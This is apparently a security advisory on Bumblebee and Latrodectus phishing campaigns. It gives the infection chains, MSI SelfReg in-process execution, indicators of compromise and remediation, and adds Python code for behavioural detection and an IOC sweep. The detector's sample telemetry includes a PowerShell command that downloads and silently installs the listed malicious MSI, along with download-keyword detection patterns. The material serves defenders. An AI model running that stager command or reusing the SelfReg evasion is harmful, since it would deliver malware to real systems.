Severity
High
Analysis Summary
Two malware loaders, Bumblebee and Latrodectus, both disrupted by the coordinated law enforcement action known as Operation Endgame, have resurfaced in new phishing campaigns. Both are built to download and run additional payloads on compromised systems and to steal personal information.
Because of infrastructure overlaps between the two families, Latrodectus (also tracked as BlackWidow, IceNova, Lotus, and Unidentified 111) is regarded as the successor to IcedID. It has been used in campaigns by the initial access brokers (IABs) TA577 (also known as Water Curupira) and TA578. In May 2024, a coalition of European countries took down more than 100 servers tied to several malware operations, including IcedID (and by extension Latrodectus), SystemBC, PikaBot, SmokeLoader, Bumblebee, and TrickBot.
Although Latrodectus was not named in the operation, it was affected as well and its infrastructure went offline. In a report released earlier this month, researchers described Latrodectus as a distinct threat that has gained momentum since Operation Endgame: it was hit at first but recovered quickly, and its capabilities made it a serious threat that filled the gap left by the loaders the operation disrupted.
Attack chains typically begin with malspam campaigns that hijack existing email threads and impersonate trusted brands such as Google Cloud and Microsoft Azure. The DocuSign-themed emails in the infection sequence recently identified by security researchers follow the same pattern: they carry either HTML files with embedded JavaScript or PDF attachments containing a malicious link, designed to download a PowerShell script or an MSI installer, respectively.
Whichever path is taken, the chain ends with the deployment of a malicious DLL that launches Latrodectus. Using both new and previously seen infrastructure, Latrodectus delivers malware payloads to targets in the commercial, automotive, and financial sectors. Running alongside the Latrodectus activity is a Bumblebee loader campaign that uses a ZIP archive, most likely delivered through phishing emails.
The ZIP archive contains an LNK file named "Report-41952.lnk" which, when opened, starts a sequence that downloads and executes the final Bumblebee payload in memory instead of writing the DLL to disk. The LNK file runs a PowerShell command that downloads an MSI installer from a remote server. The MSI samples, disguised as NVIDIA and Midjourney installers, serve as the vehicle that starts the Bumblebee DLL once they run.
Bumblebee uses a stealthier approach that avoids spawning additional processes and writing the final payload to disk. It does this through the MSI package's SelfReg table, which tells the Windows Installer to call the DllRegisterServer export of a file listed in the File table. Here that file was the final payload DLL, and the SelfReg entry acted as the key identifying which File table entry to execute. Because the installer engine itself loads the DLL and calls the export, the payload runs inside msiexec.exe rather than in a separate process such as rundll32.exe or regsvr32.exe, which is what a process-tree based detection would otherwise catch.
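The chain described above (LNK launches PowerShell, PowerShell fetches an MSI, msiexec installs it, and the SelfReg entry makes the installer load the payload DLL in its own process) leaves a recognisable trace in endpoint telemetry even though no payload process is spawned. The following detector is an added example written for this advisory, not code from the original page or from any vendor. The event records are constructed in a Sysmon-like shape; the field names, the process ids and the user paths are assumptions, and the MSI URL in the sample command line is the one listed under the advisory's indicators.

```python
"""Behavioural detection for the LNK -> PowerShell -> MSI -> in-process DLL chain.

Added example, not from the original advisory. Event records are constructed in a
Sysmon-like shape (process_create / image_load); the field names are assumptions,
not any vendor's schema.
"""
import re

# Common PowerShell download primitives; extend for your environment.
DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadFile|DownloadString|Start-BitsTransfer",
    re.IGNORECASE)
MSI_RE = re.compile(r"\.msi\b", re.IGNORECASE)
# Directories an unprivileged user can write to; a vendor installer rarely
# self-registers a DLL that lives here.
USER_WRITABLE_RE = re.compile(
    r"\\(Temp|AppData|Downloads|ProgramData|Users\\Public)\\", re.IGNORECASE)


def base_name(path):
    """Lower-case file name of a Windows path, tolerating forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_chain(events):
    """Return findings as (rule_id, pid, detail) tuples, in event order."""
    procs = {e["pid"]: e for e in events if e["event"] == "process_create"}
    findings, stagers = [], set()
    for e in events:
        if e["event"] == "process_create":
            img = base_name(e["image"])
            parent = procs.get(e["ppid"])
            parent_img = base_name(parent["image"]) if parent else ""
            cmd = e.get("cmdline", "")
            # R1: PowerShell started from Explorer (how a double-clicked LNK runs)
            # whose command line both downloads something and references an MSI.
            if (img in ("powershell.exe", "pwsh.exe") and parent_img == "explorer.exe"
                    and DOWNLOAD_RE.search(cmd) and MSI_RE.search(cmd)):
                stagers.add(e["pid"])
                findings.append(("R1_powershell_msi_stager", e["pid"], cmd))
            # R2: msiexec launched by a flagged stager, installing a package that
            # sits in a user-writable directory.
            elif img == "msiexec.exe" and e["ppid"] in stagers and USER_WRITABLE_RE.search(cmd):
                findings.append(("R2_msiexec_from_stager", e["pid"], cmd))
        elif e["event"] == "image_load":
            # R3: the Windows Installer loads an unsigned DLL from a user-writable
            # path. This is what a SelfReg entry pointing at a dropped payload looks
            # like: no rundll32/regsvr32 child, just a module load inside msiexec.exe.
            if (base_name(e["image"]) == "msiexec.exe"
                    and USER_WRITABLE_RE.search(e["loaded"])
                    and not e.get("signed", False)):
                findings.append(("R3_msiexec_unsigned_user_dll", e["pid"], e["loaded"]))
    return findings


def chain_confirmed(findings):
    """True when all three stages were seen. R3 on its own is noisy because
    legitimate installers also stage custom-action DLLs under %TEMP%."""
    seen = {rule for rule, _, _ in findings}
    return {"R1_powershell_msi_stager", "R2_msiexec_from_stager",
            "R3_msiexec_unsigned_user_dll"} <= seen


# Constructed sample telemetry for one host, following the chain in the advisory.
SAMPLE_EVENTS = [
    {"event": "process_create", "pid": 1000, "ppid": 1,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"event": "process_create", "pid": 2000, "ppid": 1000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -c "iwr http://194.54.156.91/dsa.msi -OutFile $env:TEMP\dsa.msi; msiexec /i $env:TEMP\dsa.msi /qn"'},
    {"event": "process_create", "pid": 3000, "ppid": 2000,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\alice\AppData\Local\Temp\dsa.msi /qn"},
    {"event": "image_load", "pid": 3000, "image": r"C:\Windows\System32\msiexec.exe",
     "loaded": r"C:\Users\alice\AppData\Local\Temp\MSI4A2F.tmp\payload.dll", "signed": False},
    # Benign noise: a user installing a downloaded vendor package from Explorer.
    {"event": "process_create", "pid": 4000, "ppid": 1000,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\alice\Downloads\vendor-tool.msi"},
]

if __name__ == "__main__":
    found = detect_chain(SAMPLE_EVENTS)
    for rule, pid, detail in found:
        print(f"{rule:32} pid={pid} {detail}")
    print("chain confirmed:", chain_confirmed(found))
```

R1 and R2 are cheap to evaluate on process-creation telemetry alone; R3 needs image-load events, which most EDRs and Sysmon (event 7) can supply, and is the one rule that catches the in-process SelfReg execution the advisory describes. The benign msiexec launched directly from Explorer is deliberately not flagged, since it has no stager parent.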
Impact
- Sensitive Data Theft
- Unauthorized Access
- Financial Loss
- Identity Theft
Indicators of Compromise
Domain Name
- tiguanin.com
- greshunka.com
- bazarunet.com
- mazinom.com
- leroboy.com
- krinzhodom.com
- klemanzino.net
- rilomenifis.com
- isomicrotich.com
IP
- 194.54.156.91
MD5
- 9fbff5e231c2cad8612ad112e1bb78ea
- 528eb8826dffaea4080fbc60d6295016
- 3cb6b99b20930ac0dbadc10899dc511e
- bc8e744b7004cf5f0d36aba128abb175
- b9a2848089e8e6e46acfd3578fc57de0
SHA-256
- 3b86c9516bd5d57758ab976e32af2d7873d7ad0b0e063a49ee13c168f2c1e980
- 0a42503e19d36070db3b03249cad33c73ee941b7af32170f25234ac5f3a30823
- ea1792f689bfe5ad3597c7f877b66f9fcf80d732e5233293d52d374d50cab991
- 617e31e9f71b365fe69719d3fc980d763e827a4f93d0e776d1587d0bfdb47674
- 6ab1bee44804b0821933c7b20bbdc92deb6a21fd587a51d43761ba1500c2149d
SHA-1
- 9361621490915ebb919b79c6101874f03e4e51bc
- 71e99a21ffa29e1e391811f5a3d04dcbb9cf0949
- 570c4ab78cf4bb22b78aac215a4a79189d4fa9ed
- 62e23500cc5368e37be47371342784f72e481647
- 7474873629399ee5fdd984c99b705e0490ab8707
URL
- https://delview.com/MobileDefault.aspx?reff=https://cutt.ly/seU8MT6t
- https://cutt.ly/seU8MT6t
- https://digitalpinnaclepub.com/?3
- https://storage.googleapis.com/braided-turbine-435813-n7.appspot.com/VA8PBxartt/Document-20-17-57.js
- http://194.54.156.91/dsa.msi
- http://gertioma.top/o.jpg
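The remediation section below asks for the indicators to be searched for across your controls. The script that follows is an added example for that sweep, not part of the original advisory: it loads the domains, IP, URLs and a subset of the hashes listed above, normalises them, and runs them over a few constructed log lines (proxy, DNS, EDR and an analyst note). The log formats are assumptions about a generic SIEM export. It goes slightly beyond a plain string match in the ways a practitioner usually needs: subdomains of a listed domain count, hash case is ignored, defanged text (hxxp, [.]) is refanged, and a URL carried inside another URL's query string (the delview.com indicator wraps the cutt.ly one in its reff= parameter) is matched on its own.

```python
"""Sweep log lines for the indicators of compromise listed in this advisory.

Added example, not part of the original advisory. Indicator values are copied
from the list above (hashes: a subset, extend the same way); log lines below are
constructed and the log formats are assumptions.
"""
import re
from urllib.parse import parse_qs, urlsplit

IOC_DOMAINS = {
    "tiguanin.com", "greshunka.com", "bazarunet.com", "mazinom.com", "leroboy.com",
    "krinzhodom.com", "klemanzino.net", "rilomenifis.com", "isomicrotich.com",
}
IOC_IPS = {"194.54.156.91"}
IOC_URLS = {
    "https://delview.com/MobileDefault.aspx?reff=https://cutt.ly/seU8MT6t",
    "https://cutt.ly/seU8MT6t",
    "https://digitalpinnaclepub.com/?3",
    "https://storage.googleapis.com/braided-turbine-435813-n7.appspot.com/VA8PBxartt/Document-20-17-57.js",
    "http://194.54.156.91/dsa.msi",
    "http://gertioma.top/o.jpg",
}
IOC_HASHES = {h.lower() for h in (
    "9fbff5e231c2cad8612ad112e1bb78ea",                                   # MD5
    "9361621490915ebb919b79c6101874f03e4e51bc",                           # SHA-1
    "3b86c9516bd5d57758ab976e32af2d7873d7ad0b0e063a49ee13c168f2c1e980",   # SHA-256
)}

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
HOST_RE = re.compile(r"\b[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)+\b",
                     re.IGNORECASE)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HASH_RE = re.compile(r"\b(?:[0-9a-f]{64}|[0-9a-f]{40}|[0-9a-f]{32})\b", re.IGNORECASE)


def refang(text):
    """Undo common defanging so pasted report text matches like raw logs."""
    return (text.replace("hxxps://", "https://").replace("hxxp://", "http://")
                .replace("[.]", ".").replace("[:]", ":"))


def normalize_url(url):
    """Lower-case scheme and host only; path and query stay case-significant."""
    p = urlsplit(url.rstrip(".,;)"))
    return p._replace(scheme=p.scheme.lower(), netloc=p.netloc.lower()).geturl()


IOC_URLS_N = {normalize_url(u) for u in IOC_URLS}


def urls_in(text):
    """All URLs in a line, plus any URL nested inside another URL's query string."""
    found = []
    for raw in URL_RE.findall(text):
        url = normalize_url(raw)
        found.append(url)
        for values in parse_qs(urlsplit(url).query).values():
            found.extend(normalize_url(v) for v in values
                         if v.lower().startswith(("http://", "https://")))
    return found


def scan_line(line):
    """Return sorted (ioc_type, value) pairs for every indicator present in the line."""
    text = refang(line)
    hits = set()
    hits.update(("url", u) for u in urls_in(text) if u in IOC_URLS_N)
    hits.update(("ip", ip) for ip in IP_RE.findall(text) if ip in IOC_IPS)
    for host in HOST_RE.findall(text):
        h = host.lower()
        if any(h == d or h.endswith("." + d) for d in IOC_DOMAINS):  # subdomains count
            hits.add(("domain", h))
    hits.update(("hash", d.lower()) for d in HASH_RE.findall(text) if d.lower() in IOC_HASHES)
    return sorted(hits)


def sweep(lines):
    """Map line index -> hits, for lines that matched at least one indicator."""
    return {i: hits for i, line in enumerate(lines) if (hits := scan_line(line))}


# Constructed sample lines; timestamps, hosts and user names are made up.
SAMPLE_LOG = [
    'proxy 2024-01-01T09:14:02Z user=alice method=GET url=https://delview.com/MobileDefault.aspx?reff=https://cutt.ly/seU8MT6t status=302',
    'dns 2024-01-01T09:15:40Z client=10.0.0.12 query=cdn.tiguanin.com type=A',
    r'edr 2024-01-01T09:16:01Z host=WS-17 file=C:\Users\alice\AppData\Local\Temp\dsa.msi sha256=3B86C9516BD5D57758AB976E32AF2D7873D7AD0B0E063A49EE13C168F2C1E980',
    'note analyst pasted: stager fetched from hxxp://194[.]54[.]156[.]91/dsa.msi',
    'proxy 2024-01-01T09:20:11Z user=bob method=GET url=https://www.example.com/index.html status=200',
]

if __name__ == "__main__":
    for idx, hits in sweep(SAMPLE_LOG).items():
        print(idx, hits)
```

Matching whole URLs rather than their hosts matters for the cutt.ly and storage.googleapis.com indicators: blocking or alerting on those hosts outright would flood you with benign traffic, so the URL list is kept separate from the domain list exactly as the advisory presents it.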
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Do not download documents attached in emails from unknown sources and strictly refrain from enabling macros when the source isn’t reliable.
- Ensure that all systems, software, and applications are up-to-date with the latest security patches. Regularly check for and apply updates to eliminate known vulnerabilities that attackers could exploit.
- Educate employees about phishing emails, social engineering tactics, and safe online behavior. Effective training can reduce the likelihood of users inadvertently initiating an attack.
- Regularly back up critical data and systems to offline or isolated storage. Test the backup restoration process to ensure that it is effective in case of an attack.
- Deploy strong endpoint protection solutions that include advanced threat detection, behavior monitoring, and real-time protection against malware and ransomware.
- Employ robust email filtering and anti-phishing solutions to detect and prevent malicious attachments and links from reaching user inboxes.
- Conduct regular penetration testing and security assessments to identify vulnerabilities and weaknesses in your network and systems. Address any findings promptly.
- Thoroughly assess third-party vendors and software before integrating them into your environment. Ensure they have strong security practices and adhere to cybersecurity standards.